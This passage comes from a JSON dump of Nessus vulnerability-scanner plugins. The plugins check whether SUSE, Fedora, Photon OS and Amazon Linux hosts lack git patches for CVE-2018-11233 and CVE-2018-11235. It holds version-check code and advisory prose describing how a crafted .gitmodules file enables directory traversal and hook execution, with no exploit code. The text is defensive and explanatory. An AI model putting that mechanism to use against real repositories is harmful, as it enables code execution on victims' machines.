reference:\"git-email-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-gui-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-p4-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-svn-debuginfo-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"git-web-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"gitk-2.16.4-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-arch-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-core-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-core-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-credential-gnome-keyring-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-credential-gnome-keyring-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-cvs-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-daemon-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-daemon-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-debugsource-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-email-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-gui-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-svn-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-svn-debuginfo-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"git-web-2.13.7-13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"gitk-2.13.7-13.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:54", "description": "Upstream security fixes related to .gitmodules handling. From the [upstream announcement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct .c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules file, but we blindly append them to $GIT_DIR/modules to create our on-disk repo paths. This means you can do bad things by putting '../' into the name. We now enforce some rules for submodule names which will cause Git to ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of concept from which the test script was adapted goes to Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks paths on NTFS into reading random piece of memory (CVE-2018-11233). ```\n\nAlso fix a segfault in rev-parse with invalid input (#1581678) and install contrib/diff-highlight (#1550251).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-04T00:00:00", "type": "nessus", "title": "Fedora 27 : git (2018-080a3d7866)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:git", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-080A3D7866.NASL", "href": "https://www.tenable.com/plugins/nessus/110299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-080a3d7866.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110299);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-080a3d7866\");\n\n script_name(english:\"Fedora 27 : git (2018-080a3d7866)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security fixes related to .gitmodules handling. From the\n[upstream\nannouncement](https://public-inbox.org/git/xmqqy3g2flb6.fsf@gitster-ct\n.c.googlers.com/) :\n\n```\n\n - Submodule 'names' come from the untrusted .gitmodules\n file, but we blindly append them to $GIT_DIR/modules to\n create our on-disk repo paths. This means you can do bad\n things by putting '../' into the name. We now enforce\n some rules for submodule names which will cause Git to\n ignore these malicious names (CVE-2018-11235).\n\n Credit for finding this vulnerability and the proof of\n concept from which the test script was adapted goes to\n Etienne Stalmans.\n\n - It was possible to trick the code that sanity-checks\n paths on NTFS into reading random piece of memory\n (CVE-2018-11233). ```\n\nAlso fix a segfault in rev-parse with invalid input (#1581678) and\ninstall contrib/diff-highlight (#1550251).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-080a3d7866\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"git-2.14.4-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:53:04", "description": "An update of {'git'} packages of Photon OS has been released.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Photon OS update (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0145.NASL", "href": "https://www.tenable.com/plugins/nessus/111273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0145. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111273);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_bugtraq_id(104345, 104346);\n\n script_name(english:\"Photon OS update (deprecated)\");\n script_summary(english:\"Checks the package version of Git on PhotonOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of {'git'} packages of Photon OS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-145\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c77e146\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"git-2.17.1-1.ph1\",\n \"git-debuginfo-2.17.1-1.ph1\",\n \"git-lang-2.17.1-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:53:17", "description": "An update of {'git'} packages of Photon OS has been released.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-24T00:00:00", "type": "nessus", "title": "Photon OS 2.0 : git (PhotonOS-PHSA-2018-2.0-0053) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2018-2_0-0053.NASL", "href": "https://www.tenable.com/plugins/nessus/111307", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-2.0-0053. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111307);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_bugtraq_id(104345, 104346);\n\n script_name(english:\"Photon OS 2.0 : git (PhotonOS-PHSA-2018-2.0-0053) (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of {'git'} packages of Photon OS has been released.\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n # https://github.com/vmware/photon/wiki/Security-Updates-2-53\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0ba53177\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"git-2.17.1-1.ph2\",\n \"git-debuginfo-2.17.1-1.ph2\",\n \"git-lang-2.17.1-1.ph2\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:43:19", "description": "An update of the git package has been released.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Git PHSA-2018-1.0-0145", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:git", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0145_GIT.NASL", "href": "https://www.tenable.com/plugins/nessus/121844", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0145. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121844);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"Photon OS 1.0: Git PHSA-2018-1.0-0145\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the git package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-145.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11235\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-debuginfo-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-debuginfo-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-lang-2.17.1-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"git-lang-2.17.1-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:05", "description": "In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : git (ALAS-2018-1035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:emacs-git", "p-cpe:/a:amazon:linux:emacs-git-el", "p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:git-bzr", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-hg", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:perl-Git-SVN", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1035.NASL", "href": "https://www.tenable.com/plugins/nessus/110458", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1035.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110458);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"ALAS\", value:\"2018-1035\");\n\n script_name(english:\"Amazon Linux AMI : git (ALAS-2018-1035)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, code to sanity-check\npathnames on NTFS can result in reading out-of-bounds\nmemory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution\ncan occur. With a crafted .gitmodules file, a malicious project can\nexecute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this\nfile, and then appended to $GIT_DIR/modules, leading to directory\ntraversal with '../' in a name. Finally, post-checkout hooks from a\nsubmodule are executed, bypassing the intended design in which hooks\nare not obtained from a remote server.(CVE-2018-11235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1035.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update git' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", 